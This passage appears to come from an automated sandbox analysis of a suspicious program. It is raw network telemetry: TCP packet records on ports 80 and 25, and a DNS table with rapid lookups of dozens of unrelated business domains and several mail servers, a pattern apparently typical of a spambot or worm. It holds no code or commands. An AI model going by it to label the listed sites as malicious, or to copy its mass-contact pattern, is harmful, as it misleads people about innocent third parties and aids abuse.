                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.271066904 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.271119118 CEST4997480192.168.2.3172.67.206.199
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.271122932 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.271183968 CEST4997480192.168.2.3172.67.206.199
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.271209002 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.271313906 CEST4997480192.168.2.3172.67.206.199
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.271931887 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.271997929 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.272031069 CEST4997480192.168.2.3172.67.206.199
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.272066116 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.272082090 CEST4997480192.168.2.3172.67.206.199
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.272131920 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.272176027 CEST4997480192.168.2.3172.67.206.199
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.272270918 CEST4997480192.168.2.3172.67.206.199
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.272808075 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.272876978 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.273140907 CEST4997480192.168.2.3172.67.206.199
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.273202896 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.273308039 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.273341894 CEST4997480192.168.2.3172.67.206.199
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.273420095 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.273479939 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.273510933 CEST4997480192.168.2.3172.67.206.199
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.273919106 CEST4997480192.168.2.3172.67.206.199
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.274171114 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.274275064 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.274336100 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.274363995 CEST4997480192.168.2.3172.67.206.199
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.274388075 CEST4997480192.168.2.3172.67.206.199
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.274425983 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.274542093 CEST4997480192.168.2.3172.67.206.199
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.275190115 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.275329113 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.275357008 CEST4997480192.168.2.3172.67.206.199
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.275391102 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.275429964 CEST4997480192.168.2.3172.67.206.199
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.275459051 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.275479078 CEST4997480192.168.2.3172.67.206.199
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.275506020 CEST4997480192.168.2.3172.67.206.199
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.276308060 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.276355028 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.276386023 CEST4997480192.168.2.3172.67.206.199
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.276418924 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.276598930 CEST4997480192.168.2.3172.67.206.199
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.277089119 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.277189970 CEST4997480192.168.2.3172.67.206.199
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.277384043 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.277921915 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.277954102 CEST4997480192.168.2.3172.67.206.199
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.278001070 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.278098106 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.278115034 CEST4997480192.168.2.3172.67.206.199
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.278165102 CEST4997480192.168.2.3172.67.206.199
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.278184891 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.278254986 CEST8049974172.67.206.199192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.278274059 CEST4997480192.168.2.3172.67.206.199
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.278326035 CEST4997480192.168.2.3172.67.206.199
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.282216072 CEST804998118.197.121.220192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.282346964 CEST4998180192.168.2.318.197.121.220
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.282756090 CEST4998180192.168.2.318.197.121.220
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.282756090 CEST4998180192.168.2.318.197.121.220
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.283158064 CEST8049975199.59.243.225192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.283196926 CEST8049975199.59.243.225192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.283260107 CEST4997580192.168.2.3199.59.243.225
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.283260107 CEST4997580192.168.2.3199.59.243.225
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.288522005 CEST5000280192.168.2.3174.129.25.170
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.293648005 CEST4995325192.168.2.3195.96.252.188
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.296768904 CEST4994080192.168.2.393.189.66.202
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.296813011 CEST4994080192.168.2.393.189.66.202
                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.547422886 CEST192.168.2.31.1.1.10x6ad3Standard query (0)www.pdqhomes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.547476053 CEST192.168.2.31.1.1.10x14d8Standard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.547684908 CEST192.168.2.31.1.1.10x8fd7Standard query (0)www.jenco.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.547734022 CEST192.168.2.31.1.1.10x6125Standard query (0)www.pr-park.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.547974110 CEST192.168.2.31.1.1.10x98cStandard query (0)www.olras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.547985077 CEST192.168.2.31.1.1.10x7068Standard query (0)www.dgmna.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.548228025 CEST192.168.2.31.1.1.10x17d5Standard query (0)www.quadlock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.548247099 CEST192.168.2.31.1.1.10x9a06Standard query (0)www.baijaku.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.548446894 CEST192.168.2.31.1.1.10x7370Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.548475027 CEST192.168.2.31.1.1.10x2602Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.137662888 CEST192.168.2.31.1.1.10x2a0Standard query (0)www.alteor.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.382210970 CEST192.168.2.31.1.1.10x868fStandard query (0)www.valdal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.523919106 CEST192.168.2.31.1.1.10x88aStandard query (0)www.depalo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.559783936 CEST192.168.2.31.1.1.10x7370Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.955580950 CEST192.168.2.31.1.1.10xd286Standard query (0)www.petsfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.964862108 CEST192.168.2.31.1.1.10xd47bStandard query (0)www.tvtools.fiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.074929953 CEST192.168.2.31.1.1.10x40c2Standard query (0)www.credo.edu.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.078394890 CEST192.168.2.31.1.1.10xbc51Standard query (0)www.item-pr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.079135895 CEST192.168.2.31.1.1.10xd589Standard query (0)www.elpro.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.336061954 CEST192.168.2.31.1.1.10xdd9bStandard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.343295097 CEST192.168.2.31.1.1.10xb1beStandard query (0)www.otena.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.537945032 CEST192.168.2.31.1.1.10xa33eStandard query (0)www.abart.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:04.559523106 CEST192.168.2.31.1.1.10x7370Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.233366013 CEST192.168.2.31.1.1.10xcb9bStandard query (0)www.evcpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.233366013 CEST192.168.2.31.1.1.10x6558Standard query (0)www.abdg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.294426918 CEST192.168.2.31.1.1.10x2efeStandard query (0)www.hummer.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.449598074 CEST192.168.2.31.1.1.10xafd8Standard query (0)www.mqs.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.767992973 CEST192.168.2.31.1.1.10x3f1Standard query (0)www.transsib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:05.840256929 CEST192.168.2.31.1.1.10x7966Standard query (0)www.ora.ecnet.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.142083883 CEST192.168.2.31.1.1.10x8e24Standard query (0)www.xaicom.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.231447935 CEST192.168.2.31.1.1.10x6558Standard query (0)www.abdg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.450268030 CEST192.168.2.31.1.1.10xafd8Standard query (0)www.mqs.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.765667915 CEST192.168.2.31.1.1.10x3f1Standard query (0)www.transsib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.797730923 CEST192.168.2.31.1.1.10x62abStandard query (0)www.waldi.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:06.974756002 CEST192.168.2.31.1.1.10xd9c3Standard query (0)www.iamdirt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:07.255778074 CEST192.168.2.31.1.1.10x6558Standard query (0)www.abdg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:07.289138079 CEST192.168.2.31.1.1.10x1bfdStandard query (0)www.gpthink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:07.769643068 CEST192.168.2.31.1.1.10x863eStandard query (0)www.aevga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:07.903054953 CEST192.168.2.31.1.1.10x1ce4Standard query (0)www.naoi-a.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:07.943969965 CEST192.168.2.31.1.1.10x3a73Standard query (0)www.wifi4all.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:08.066000938 CEST192.168.2.31.1.1.10x3a58Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:08.072694063 CEST192.168.2.31.1.1.10xd7a7Standard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:08.659759045 CEST192.168.2.31.1.1.10xc5cbStandard query (0)www.fcwcvt.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:08.912055016 CEST192.168.2.31.1.1.10x2bc3Standard query (0)www.stnic.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.982213020 CEST192.168.2.31.1.1.10xd7a7Standard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.982244968 CEST192.168.2.31.1.1.10x2bc3Standard query (0)www.stnic.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.049746037 CEST192.168.2.31.1.1.10xdb65Standard query (0)www.nelipak.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.058793068 CEST192.168.2.31.1.1.10x6eb0Standard query (0)www.yocinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.061362982 CEST192.168.2.31.1.1.10xf81aStandard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.336565971 CEST192.168.2.31.1.1.10xc683Standard query (0)www.kernsafe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.337091923 CEST192.168.2.31.1.1.10x349aStandard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.602345943 CEST192.168.2.31.1.1.10xe4a7Standard query (0)www.snugpak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.811105013 CEST192.168.2.31.1.1.10x8af2Standard query (0)www.netcr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.050836086 CEST192.168.2.31.1.1.10x77bStandard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.059439898 CEST192.168.2.31.1.1.10xdb65Standard query (0)www.nelipak.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.128175020 CEST192.168.2.31.1.1.10x7e89Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.353076935 CEST192.168.2.31.1.1.10xdb99Standard query (0)www.photo4b.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.356533051 CEST192.168.2.31.1.1.10x15c2Standard query (0)www.jchysk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.356791019 CEST192.168.2.31.1.1.10x4b80Standard query (0)www.mobilnic.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.361674070 CEST192.168.2.31.1.1.10x933bStandard query (0)www.vitaindu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.119432926 CEST192.168.2.31.1.1.10x2e62Standard query (0)www.lrsuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.365886927 CEST192.168.2.31.1.1.10xbedfStandard query (0)www.crcsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.367362022 CEST192.168.2.31.1.1.10x8f5dStandard query (0)www.edimart.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.367770910 CEST192.168.2.31.1.1.10x4202Standard query (0)www.tyrns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.608467102 CEST192.168.2.31.1.1.10xa2dStandard query (0)www.valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.614574909 CEST192.168.2.31.1.1.10xe4a7Standard query (0)www.dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.185786963 CEST192.168.2.31.1.1.10xb1c8Standard query (0)www.ora-ito.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.185909986 CEST192.168.2.31.1.1.10xe3d8Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:13.404026031 CEST192.168.2.31.1.1.10x2501Standard query (0)www.stajum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.152369976 CEST192.168.2.31.1.1.10xc516Standard query (0)www.pcgrate.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.370322943 CEST192.168.2.31.1.1.10x9a10Standard query (0)www.2print.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:14.830015898 CEST192.168.2.31.1.1.10x8317Standard query (0)www.spanesi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:15.049894094 CEST192.168.2.31.1.1.10xc7caStandard query (0)www.x0c.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:15.251137018 CEST192.168.2.31.1.1.10x2bf9Standard query (0)www.pupi.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:15.571898937 CEST192.168.2.31.1.1.10x8b4dStandard query (0)www.fink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.022633076 CEST192.168.2.31.1.1.10xdf07Standard query (0)www.tc17.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.161643028 CEST192.168.2.31.1.1.10x7f7Standard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:16.668384075 CEST192.168.2.31.1.1.10xb039Standard query (0)www.nqks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:17.600529909 CEST192.168.2.31.1.1.10xa7c8Standard query (0)www.myropcb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:19.979680061 CEST192.168.2.31.1.1.10x13e5Standard query (0)www.yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:20.981724024 CEST192.168.2.31.1.1.10x13e5Standard query (0)www.yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:21.885138035 CEST192.168.2.31.1.1.10x1bdfStandard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:22.881261110 CEST192.168.2.31.1.1.10x93dStandard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:23.760807991 CEST192.168.2.31.1.1.10xd214Standard query (0)www.medius.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:24.540267944 CEST192.168.2.31.1.1.10x11a8Standard query (0)www.ka-mo-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:26.149799109 CEST192.168.2.31.1.1.10xd7f5Standard query (0)www.com-sit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.402595043 CEST192.168.2.31.1.1.10xa63dStandard query (0)www.nunomira.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:27.470495939 CEST192.168.2.31.1.1.10x387eStandard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.196969986 CEST192.168.2.31.1.1.10x1d29Standard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.377217054 CEST192.168.2.31.1.1.10x1facStandard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:28.629230022 CEST192.168.2.31.1.1.10x946Standard query (0)www.vexcom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.213639975 CEST192.168.2.31.1.1.10x28b6Standard query (0)www.sjbs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.095650911 CEST192.168.2.31.1.1.10x8af8Standard query (0)www.maktraxx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.988071918 CEST192.168.2.31.1.1.10x1f9aStandard query (0)www.cel-cpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:32.027697086 CEST192.168.2.31.1.1.10x4603Standard query (0)www.fe-bauer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:32.824686050 CEST192.168.2.31.1.1.10x7d9Standard query (0)smtp.compuserve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:34.185167074 CEST192.168.2.31.1.1.10x8557Standard query (0)www.rs-ag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:34.506639004 CEST192.168.2.31.1.1.10xffccStandard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:34.507414103 CEST192.168.2.31.1.1.10x9bdbStandard query (0)www.ottospm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:34.515502930 CEST192.168.2.31.1.1.10x62a0Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:34.742964983 CEST192.168.2.31.1.1.10x44b8Standard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:35.497205973 CEST192.168.2.31.1.1.10xffccStandard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:35.731400967 CEST192.168.2.31.1.1.10x44b8Standard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:36.313298941 CEST192.168.2.31.1.1.10x34c5Standard query (0)www.railbook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:36.512552023 CEST192.168.2.31.1.1.10xffccStandard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:36.731406927 CEST192.168.2.31.1.1.10x44b8Standard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:37.327133894 CEST192.168.2.31.1.1.10x7a82Standard query (0)www.t-tre.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:38.512721062 CEST192.168.2.31.1.1.10xffccStandard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:38.545051098 CEST192.168.2.31.1.1.10x89d6Standard query (0)mail.airmail.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:38.956098080 CEST192.168.2.31.1.1.10x293Standard query (0)www.cokocoko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:40.279944897 CEST192.168.2.31.1.1.10x87cStandard query (0)www.speelhal.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:41.623629093 CEST192.168.2.31.1.1.10x4f16Standard query (0)www.findbc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:42.500071049 CEST192.168.2.31.1.1.10xc741Standard query (0)www.c9dd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:44.497494936 CEST192.168.2.31.1.1.10x83d2Standard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:44.535326004 CEST192.168.2.31.1.1.10x3170Standard query (0)www.domon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:45.188400030 CEST192.168.2.31.1.1.10x6025Standard query (0)www.pwd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:46.059118986 CEST192.168.2.31.1.1.10xec63Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:49.483755112 CEST192.168.2.31.1.1.10xc2d4Standard query (0)www.fnsds.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:49.483755112 CEST192.168.2.31.1.1.10x3d80Standard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.420211077 CEST192.168.2.31.1.1.10x8ef5Standard query (0)www.pohlfood.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:50.705195904 CEST192.168.2.31.1.1.10x77c1Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:51.715651989 CEST192.168.2.31.1.1.10x77c1Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.196701050 CEST192.168.2.31.1.1.10xb430Standard query (0)www.11tochi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.325249910 CEST192.168.2.31.1.1.10xbbe7Standard query (0)k-nikko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.325366974 CEST192.168.2.31.1.1.10x2ea9Standard query (0)atb-lit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.326419115 CEST192.168.2.31.1.1.10xc1baStandard query (0)amic.atA (IP address)IN (0x0001)false
